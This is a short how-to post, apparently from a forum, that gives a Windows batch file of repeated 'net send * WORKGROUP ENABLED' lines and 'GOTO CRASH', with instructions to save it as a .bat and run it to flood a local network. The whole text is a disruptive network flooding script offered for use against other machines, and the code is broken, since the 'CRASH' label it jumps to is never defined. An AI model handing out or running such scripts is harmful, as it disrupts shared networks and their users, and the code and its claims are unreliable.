The below code will temporarily flood network once the user turns off his comp everything will be backto normal.
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flooding your network.

net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
